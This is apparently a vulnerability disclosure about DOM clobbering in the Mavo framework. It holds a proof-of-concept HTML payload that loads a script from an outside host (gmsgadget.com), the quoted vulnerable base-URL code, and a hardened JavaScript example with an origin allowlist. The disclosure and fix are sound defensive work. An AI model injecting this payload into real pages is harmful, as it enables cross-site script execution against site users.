Mavo is an HTML-based language for building small scale data-driven websites without programming knowledge (no JS, no backends needed!), just by writing HTML. For JavaScript developers (who like HTML), Mavo can also be used as a declarative, reactive front-end framework to make UI development easier.
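Mavo's library was using document.currentScript as the base reference when loading plugin dependencies. An injected element whose name attribute is currentScript shadows that property (DOM clobbering), so the base URL is read from the injected element's src instead of from the running script.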
<!-- user input -->
<img name="currentScript" src="https://gmsgadget.com/assets/xss/index.js">
<script nonce="secret" src="https://get.mavo.io/stable/mavo.js"></script>
<script nonce="secret">
(function ($, $$) {
    Mavo.Plugins.register("myplugin", {
        dependencies: [ "index.js" ],
    });
})(Bliss, Bliss.$);
</script>
Root Cause
Source: https://github.com/mavoweb/mavo/blob/78efe2b9cadd09c1d131b8afd5fe2f38d5cfa8c7/src/plugins.js#L95
if (o.dependencies) {
    let base = document.currentScript? document.currentScript.src : location;
    let dependencies = o.dependencies.map(url => Mavo.load(url, base));
    ready.push(...dependencies);
}
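Added example (not Mavo's code or its actual fix): the base lookup quoted above next to a hardened form that only trusts currentScript when it is a real script element, plus an origin allowlist on the resolved dependency. resolveBase, dependencyUrl, the Fake* classes and the page URL are assumptions made for illustration.

```javascript
// Added example: resolveBase and dependencyUrl are hypothetical helpers, not Mavo APIs.
// FakeScript / FakeImg are constructed stand-ins for HTMLScriptElement /
// HTMLImageElement so the logic runs under Node without a DOM.
class FakeScript { constructor(src) { this.src = src; } }
class FakeImg { constructor(src) { this.src = src; } }

// Behaviour of the line quoted from plugins.js: trusts whatever object
// document.currentScript evaluates to.
function vulnerableBase(doc, location) {
  return doc.currentScript ? doc.currentScript.src : location;
}

// Hardened: accept currentScript only if it really is a script element.
// An <img name="currentScript"> is an image element, so it fails this check.
function resolveBase(doc, location, ScriptElement) {
  const cs = doc.currentScript;
  if (cs instanceof ScriptElement && typeof cs.src === "string" && cs.src !== "") {
    return cs.src;
  }
  return location;
}

// Second layer: resolve the dependency and reject unexpected origins.
function dependencyUrl(dep, base, allowedOrigins) {
  const url = new URL(dep, base);
  if (!allowedOrigins.includes(url.origin)) {
    throw new Error("dependency origin not allowed: " + url.origin);
  }
  return url.href;
}

// Constructed inputs: the page URL is made up; the other two URLs are from the PoC above.
const PAGE = "https://app.example/site/";
const clobbered = { currentScript: new FakeImg("https://gmsgadget.com/assets/xss/index.js") };
const genuine = { currentScript: new FakeScript("https://get.mavo.io/stable/mavo.js") };
const ALLOWED = ["https://app.example", "https://get.mavo.io"];

function demo() {
  return {
    before: new URL("index.js", vulnerableBase(clobbered, PAGE)).href,
    after: dependencyUrl("index.js", resolveBase(clobbered, PAGE, FakeScript), ALLOWED),
    genuine: dependencyUrl("index.js", resolveBase(genuine, PAGE, FakeScript), ALLOWED),
  };
}
console.log(demo());
```

In a browser, pass HTMLScriptElement as the third argument to resolveBase and the real document and location.href as the first two.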
Found by jackfromeast, ishmeals.